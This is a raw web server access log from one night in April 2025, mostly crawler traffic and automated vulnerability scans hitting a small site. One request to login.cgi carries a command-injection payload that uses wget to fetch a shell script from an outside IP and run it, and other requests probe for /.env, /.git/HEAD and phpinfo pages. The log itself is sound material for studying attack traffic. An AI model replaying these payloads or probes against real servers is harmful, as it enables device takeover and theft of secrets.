156.59.198.136 - - [10/Apr/2025:02:03:49 +0200] "GET /renault.activities.at/htdocs/binaries/10023570.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:02:06:24 +0200] "GET /renault.activities.at/htdocs/binaries/renault-/rs-1342018-fr.pdf HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.167.56 - - [10/Apr/2025:02:08:33 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b03f6f76be748be560864e70e8dbe5ec HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.167.56 - - [10/Apr/2025:02:08:33 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b03f6f76be748be560864e70e8dbe5ec HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.167.56 - - [10/Apr/2025:02:08:34 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b03f6f76be748be560864e70e8dbe5ec HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [10/Apr/2025:02:11:52 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c34a344762052c442d08799cad37c2e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [10/Apr/2025:02:11:52 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c34a344762052c442d08799cad37c2e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [10/Apr/2025:02:11:52 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c34a344762052c442d08799cad37c2e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:02:14:44 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504676.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:02:14:53 +0200] "GET /renault.2web.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.191.138 - - [10/Apr/2025:02:17:51 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=daebad3bc28545a7407e6bd4bdaab0f0 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:02:17:52 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=daebad3bc28545a7407e6bd4bdaab0f0 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:02:17:52 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=daebad3bc28545a7407e6bd4bdaab0f0 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [10/Apr/2025:02:18:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [10/Apr/2025:02:20:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /php2.php HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /phpinfo.php HTTP/1.1" 200 10329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /infophp.php HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /i.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /php_info.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22"
194.50.16.252 - - [10/Apr/2025:02:23:47 +0200] "GET /test.php HTTP/1.1" 200 20 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
194.50.16.252 - - [10/Apr/2025:02:23:56 +0200] "GET /a.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.2.22"
185.255.122.19 - - [10/Apr/2025:02:25:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [10/Apr/2025:02:30:02 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
154.81.156.54 - - [10/Apr/2025:02:39:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.160.247 - - [10/Apr/2025:02:40:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf14b1a429447d5631cd550a922c6292 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.247 - - [10/Apr/2025:02:40:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf14b1a429447d5631cd550a922c6292 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.247 - - [10/Apr/2025:02:40:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf14b1a429447d5631cd550a922c6292 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
80.82.77.202 - - [10/Apr/2025:02:42:42 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
154.83.103.100 - - [10/Apr/2025:02:45:42 +0200] "GET /.git/HEAD HTTP/1.1" 404 298 "-" "-"
154.83.103.100 - - [10/Apr/2025:02:45:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.100 - - [10/Apr/2025:02:46:16 +0200] "GET /phpinfo HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
151.106.181.25 - - [10/Apr/2025:02:47:52 +0200] "GET /download/file.php?id=254&sid=c4442f772187b7f93af5b7b474e6d7de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:02:47:52 +0200] "GET /download/file.php?id=254&sid=c4442f772187b7f93af5b7b474e6d7de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:02:47:53 +0200] "GET /download/file.php?id=254&sid=c4442f772187b7f93af5b7b474e6d7de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:02:54:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6b30224d0b5a91ea4ee25522178fb92f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:02:54:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6b30224d0b5a91ea4ee25522178fb92f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:02:54:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6b30224d0b5a91ea4ee25522178fb92f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:02:54:57 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=7bf126ea071b2f23a506d97d28061aef HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:02:54:57 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=7bf126ea071b2f23a506d97d28061aef HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:02:54:57 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=7bf126ea071b2f23a506d97d28061aef HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:03:03:28 +0200] "GET /docs/contadino/2017/GS17-000004.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.163.149 - - [10/Apr/2025:03:03:39 +0200] "GET /download/file.php?id=256&sid=5656760e850e90cc60f26b54aea41154 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [10/Apr/2025:03:03:39 +0200] "GET /download/file.php?id=256&sid=5656760e850e90cc60f26b54aea41154 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [10/Apr/2025:03:03:39 +0200] "GET /download/file.php?id=256&sid=5656760e850e90cc60f26b54aea41154 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:03:07:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.162.8 - - [10/Apr/2025:03:10:25 +0200] "GET /cron.php?cron_type=tidy_cache&sid=154bd46a2e80296dc8497338f723e02d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:03:10:25 +0200] "GET /cron.php?cron_type=tidy_cache&sid=154bd46a2e80296dc8497338f723e02d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:03:10:25 +0200] "GET /cron.php?cron_type=tidy_cache&sid=154bd46a2e80296dc8497338f723e02d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
196.251.71.111 - - [10/Apr/2025:03:11:08 +0200] "GET /.env HTTP/1.1" 404 280 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)"
88.214.25.125 - - [10/Apr/2025:03:13:34 +0200] "\x03" 400 383 "-" "-"
156.59.198.135 - - [10/Apr/2025:03:14:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12040259.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.191.138 - - [10/Apr/2025:03:21:18 +0200] "GET /download/file.php?id=250&sid=635d78c6b2c1366790a29eaa089ee1f7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:03:21:18 +0200] "GET /download/file.php?id=250&sid=635d78c6b2c1366790a29eaa089ee1f7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:03:21:18 +0200] "GET /download/file.php?id=250&sid=635d78c6b2c1366790a29eaa089ee1f7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:03:22:33 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10355018.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:03:26:52 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00002.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [10/Apr/2025:03:27:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.160.158 - - [10/Apr/2025:03:30:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=99c09b00bde71fba1b933c952b854de9 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:03:30:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=99c09b00bde71fba1b933c952b854de9 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:03:30:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=99c09b00bde71fba1b933c952b854de9 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
57.129.64.237 - - [10/Apr/2025:03:31:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
154.81.156.35 - - [10/Apr/2025:03:32:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [10/Apr/2025:03:33:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.121.133.117 - - [10/Apr/2025:03:50:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
178.34.177.42 - - [10/Apr/2025:03:53:55 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
151.106.163.149 - - [10/Apr/2025:03:53:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=646d5696681e55949fa7aafdcdd226ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [10/Apr/2025:03:53:59 +0200] "GET /cron.php?cron_type=tidy_cache&sid=646d5696681e55949fa7aafdcdd226ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [10/Apr/2025:03:53:59 +0200] "GET /cron.php?cron_type=tidy_cache&sid=646d5696681e55949fa7aafdcdd226ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:03:55:29 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10556898.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.191.239 - - [10/Apr/2025:03:58:12 +0200] "GET /download/file.php?id=252&sid=d94eb42920fc14a677c63d2ee5a7b45a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.239 - - [10/Apr/2025:03:58:12 +0200] "GET /download/file.php?id=252&sid=d94eb42920fc14a677c63d2ee5a7b45a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.239 - - [10/Apr/2025:03:58:12 +0200] "GET /download/file.php?id=252&sid=d94eb42920fc14a677c63d2ee5a7b45a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
206.206.169.15 - - [10/Apr/2025:04:03:19 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
212.107.12.18 - - [10/Apr/2025:04:05:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:04:08:25 +0200] "GET /renault.activities.at/htdocs/binaries/10122841.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.83.103.100 - - [10/Apr/2025:04:12:12 +0200] "GET /.git/HEAD HTTP/1.1" 404 291 "-" "-"
154.81.156.54 - - [10/Apr/2025:04:13:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:04:16:39 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12304896.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:04:16:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961137.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.181.25 - - [10/Apr/2025:04:17:09 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b86939ecd98ea28a0bd1f4650bf7fd56 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:04:17:09 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b86939ecd98ea28a0bd1f4650bf7fd56 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:04:17:10 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b86939ecd98ea28a0bd1f4650bf7fd56 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:04:17:18 +0200] "GET /download/file.php?id=255&sid=5a9ec837b92f6cbe92b9a2f61cd37a6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:04:17:19 +0200] "GET /download/file.php?id=255&sid=5a9ec837b92f6cbe92b9a2f61cd37a6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:04:17:19 +0200] "GET /download/file.php?id=255&sid=5a9ec837b92f6cbe92b9a2f61cd37a6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:04:20:45 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10557019.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:04:20:54 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10658444.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:04:27:38 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00018.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:04:27:47 +0200] "GET /docs/contadino/2017/RE17-000010.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.252 - - [10/Apr/2025:04:28:49 +0200] "GET /phpinfo.php HTTP/1.1" 200 10311 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36"
154.81.156.54 - - [10/Apr/2025:04:31:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.168.134 - - [10/Apr/2025:04:34:27 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=114&sid=891b9c584f13671c0371999dfd5defa7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:04:34:27 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=114&sid=891b9c584f13671c0371999dfd5defa7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:04:34:28 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=114&sid=891b9c584f13671c0371999dfd5defa7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [10/Apr/2025:04:38:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.162.8 - - [10/Apr/2025:04:39:16 +0200] "GET /cron.php?cron_type=tidy_cache&sid=256c4d2211222ddaa23f2a4d8bba802f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:04:39:16 +0200] "GET /cron.php?cron_type=tidy_cache&sid=256c4d2211222ddaa23f2a4d8bba802f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:04:39:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=256c4d2211222ddaa23f2a4d8bba802f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:04:44:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12022654.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:04:44:32 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961122.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:04:44:41 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00013.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:04:45:47 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00020.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
134.209.249.188 - - [10/Apr/2025:04:46:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
134.209.249.188 - - [10/Apr/2025:04:46:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
